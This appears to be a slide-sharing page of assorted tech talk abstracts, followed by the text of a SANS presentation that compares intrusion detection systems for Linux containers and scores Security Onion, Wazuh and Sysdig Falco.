ABSTRACT: A prima vista, un mattoncino Lego e la backdoor XZ potrebbero avere in comune il fatto di essere entrambi blocchi di costruzione, o dipendenze di progetti creativi e software. La realtà è che un mattoncino Lego e il caso della backdoor XZ hanno molto di più di tutto ciò in comune.
Partecipate alla presentazione per immergervi in una storia di interoperabilità, standard e formati aperti, per poi discutere del ruolo importante che i contributori hanno in una comunità open source sostenibile.
BIO: Sostenitrice del software libero e dei formati standard e aperti. È stata un membro attivo dei progetti Fedora e openSUSE e ha co-fondato l'Associazione LibreItalia dove è stata coinvolta in diversi eventi, migrazioni e formazione relativi a LibreOffice. In precedenza ha lavorato a migrazioni e corsi di formazione su LibreOffice per diverse amministrazioni pubbliche e privati. Da gennaio 2020 lavora in SUSE come Software Release Engineer per Uyuni e SUSE Manager e quando non segue la sua passione per i computer e per Geeko coltiva la sua curiosità per l'astronomia (da cui deriva il suo nickname deneb_alpha).
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
Building RAG with self-deployed Milvus vector database and Snowpark Container...Zilliz
This talk will give hands-on advice on building RAG applications with an open-source Milvus database deployed as a docker container. We will also introduce the integration of Milvus with Snowpark Container Services.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
20 Comprehensive Checklist of Designing and Developing a WebsitePixlogix Infotech
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
20240609 QFM020 Irresponsible AI Reading List May 2024
Container intrusions Do You Even IDS
1. 1SANS Technology Institute - Candidate for Master of Science Degree 1
Container Intrusions: Do You
Even IDS?
Alfredo Hickman
April, 2018
GIAC GCIA, GPEN, GCIH, GSEC
2. SANS Technology Institute - Candidate for Master of Science Degree 2
Objectives
• After this presentation, you’ll have a
foundational understanding of Linux
application container benefits and history.
• You’ll be empowered with a security primer on
Linux application containers.
• You’ll understand the paradigm shift between
intrusion detection and analysis in traditional
vs. container networks.
• You’ll be able to tests and assess different
classes of container IDSs for effectiveness.
3. SANS Technology Institute - Candidate for Master of Science Degree 3
Linux Containers: Benefits and
History
1979 Unix v7
Change Root
(chroot)
Early 2000’s
FreeBSD
Jails, Linux
VServer,
Solaris Zones
2002 – 2007
Control
Groups
(cgroups),
Namespaces
2008 – 2014
LXC, Docker,
rkt
4. SANS Technology Institute - Candidate for Master of Science Degree 4
Linux Containers: a Security
Primer
• Containers security challenges:
complexity and speed
5. SANS Technology Institute - Candidate for Master of Science Degree 5
Linux Containers: a Security
Primer
• The lack of scholarly research into
container security
6. SANS Technology Institute - Candidate for Master of Science Degree 6
Linux Containers: a Security
Primer
• The vulnerability and threat landscape
of Linux containers
• Synergistic-power attack
• Process isolation escape
• Data leakage attacks (emanations)
• Spectre/Meltdown – memory read bounds
control and process isolation violation
• Compounded vulnerabilities
• Microservices and deployment density surface
area
7. SANS Technology Institute - Candidate for Master of Science Degree 7
Linux Containers: a Security
Primer
• Container security platforms and CI/CD
pipeline security
• Code contributor identity and access controls
• Code commit integrity validation
• Vulnerability management (host, packages,
images)
• Network, host, and container runtime
component hardening
• Log management, security analytics, and threat
hunting
8. SANS Technology Institute - Candidate for Master of Science Degree 8
• Intrusion detection and analysis in
traditional networks
• Static or pre-defined application network
port mappings
• Linux kernel audit (some kernel tapping)
• Network interface tapping
• Network traffic profiling and security
analytics
Linux Containers: a Security
Primer
9. SANS Technology Institute - Candidate for Master of Science Degree 9
• Intrusion detection and analysis in
container networks
• Bag of System Calls (BoSC)
• Kernel tapping modules (common place)
• Network interface tapping (software overlay
networks)
• Network observability analytics
• Adaptive application traffic profiling
• Adaptive application network port mapping
Linux Containers: a Security
Primer
11. SANS Technology Institute - Candidate for Master of Science Degree 11
• Detection of scanning activity
• Detection of application attacks
• Detection of malware deployment
• Detection of malware execution
• Detection of malicious command and
control
• Detection of malicious privilege
escalation
IDS Effectiveness Criteria &
Test Cases
12. SANS Technology Institute - Candidate for Master of Science Degree 12
IDS Effectiveness Criteria &
Test Cases
• Detection of malicious data exfiltration
• Detection of file integrity violations
• Detection of leaked system data
• Auto-detection of anomalous behavior
• Auto-detection of attacker, victim,
infrastructure relationship
• Capability for forensic artifact retrieval
(PCAP, flow, logs)
13. SANS Technology Institute - Candidate for Master of Science Degree 13
Points Criteria
1 Not effective (method did not work)
2 Moderately effective (method worked, but did not allow for
complete functionality, or equivalent to a traditional network
implementation)
Note: potential for assessor bias
3 Effective (method worked as effectively as a traditional
network implementation)
Scoring System
14. SANS Technology Institute - Candidate for Master of Science Degree 14
• Scenarios and Results
• Security Onion with Snort and OSSEC protecting a
virtualized web server hosting DVWA = 44
• Security Onion with Snort and OSSEC protecting a
Dockerized web server hosting DVWA = 40
• Wazuh with OSSEC HIDS and PCI DSS module
protecting a Dockerized web server hosting DVWA
= 38
• Sysdig Falco with the falco-probe kernel module
protecting a Dockerized web server hosting DVWA
= 43
Research Review & Results
15. SANS Technology Institute - Candidate for Master of Science Degree 15
• Intrusion detection and analysis in
traditional vs. container networks
• Research, testing, and results
• The field is hot, the practice is young,
the vulnerabilities are ongoing, and the
threats are real
Summary